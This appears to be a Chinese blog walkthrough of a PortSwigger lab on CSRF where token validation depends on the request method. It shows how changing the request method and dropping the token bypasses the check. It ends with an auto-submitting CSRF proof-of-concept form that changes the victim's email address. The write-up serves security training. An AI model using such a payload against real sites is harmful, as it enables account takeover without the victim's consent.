首页 > 其他分享 >burpsuite靶场----CSRF----token验证取决于请求方法

burpsuite靶场----CSRF----token验证取决于请求方法

时间:2023-10-13 09:45:48浏览次数:46  
标签:burpsuite ---- token CSRF 靶场 validation

burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

正式开始

1.登录

2.抓包,发现有一段token

3.尝试删掉token,发现不行

4.尝试改变请求方式


发现也能实现功能

然后再把token参数删掉,也能实现

5.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a990086031a78b8b8852db2002800f2.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
   <script>document.forms[0].submit();</script>
  </body>
</html>

6.提交

标签:burpsuite,----,token,CSRF,靶场,validation
From: https://www.cnblogs.com/thebeastofwar/p/17761153.html

相关文章

  • 用设计模式优雅干掉 if-else,真香...
    鲁讯曾说:"高端的代码,只需要最朴素的编写方式",简单的业务使用if-else或switchcase,确实直观明了,但是一旦功能复杂,业务流程长了之后,使用传统的if-else或switchcase方式,就会让代码结构变的异常冗余、混乱,过一段时间之后,哪怕是自己写的代码,读起来也会忍不住想喷上几句,这时候,如......
  • vue el-select/el-cascader获取选中的对象label值
    1.el-select获取选中对象label值<el-form-itemlabel="车辆配置"prop="sales_name"><el-selectv-if="!showSaleNameInput"v-model="form.sales_name"clearableref="itemSelect"......
  • To install it, you can run: npm install --save svg-baker-runtime/browser-symbol
    运行vue项目npmrundev命令报错报错信息:错误提示:Toinstallit,youcanrun:npminstall--savesvg-baker-runtime/browser-symbol解决:npminstall--saveregenerator-runtimesvg-baker-runtimevue-style-loader......
  • LOG4j2 漏洞复现
    一、漏洞简介1.漏洞原理ApacheLog4j2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词${,攻击者就能将关键字所包含的内容当作变量来替......
  • 类里面静态方法(@staticmethod),类方法(@classmethod)和实例方法(self)的使用与区别
    前言python类里面常用的方法有3个:静态方法(@staticmethod),类方法(@classmethod)和实例方法(self)本篇讲解这3种方法在使用上有什么区别。函数先从函数说起,方法跟函数是有区别的,经常有人容易混淆,函数定义是def关键字定义(外面没class)deffun():a="hello"returna#......
  • 策略 + 枚举 优雅的消灭 if-else
    可能初学者都会忽略掉一点,其实if-else是一种面向过程的实现。那么,如何避免在面向对象编程里大量使用if-else呢?网络上有很多解决思路,有工厂模式、策略模式、甚至是规则引擎(这个太重了吧)......这些,都有一个共同的缺点,使用起来还是过于繁重了。虽说起到了消除if-else的作用,但是,......
  • leaflet使用heatmap.js出现heatmap.js:527 Uncaught TypeError: Cannot assign to rea
    一、问题背景问题是这样发生的,因为项目中需要实现热力图的功能,所以使用了第三方的库heatmap.js。但是在一些浏览器中使用它时,会出现这个错误:>UncaughtTypeError:Cannotassigntoreadonlyproperty'data'ofobject'#<ImageData>'出现问题的原因是因为img.data=im......
  • 开源项目 | SpringBoot+XXL-JOB 构建的汽车之家开源的监控平台,支持多种报警消息发送方
     一、项目概述Frostmourne(霜之哀伤)是汽车之家经销商技术部监控系统的开源版本,用于帮助监控几乎所有数据库数据(包括Elasticsearch,Prometheus,SkyWalking,MySql等等)。如果你已经建立起了日志系统,指标体系,却苦恼于没有一个配套监控系统,也许它能帮到你。使用本系统得当,至......
  • 【Java】用户在线人数统计的简单实现
    一、需求效果:就是进入首页时能查看在线人数,没有特定要求,那我就不刷这个接口了就进入首页加载一次 二、实现思路:思路参考博客:https://blog.csdn.net/GitLuckyd/article/details/124488063如果是以前那种JSP的单体项目,可以用Servlet的监听器API来做但是不管是Servlet还......
  • 软件测试面试题-逻辑题【杭州多测师_王sir】
    1.你有不限量的水,还有两个罐子,容量分别是5升和3升,怎么取4升的水?先把3升的杯子装满,倒进5升的杯子;之后把3升的杯子装满,倒进5升的杯子,里面还剩1升。之后把5升的杯子里的水都倒掉,把3升的杯子里的1升倒进去。再把3升的杯子装满,倒进5升的杯子。2.房间内有三盏灯,房外有三个开关,只能......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99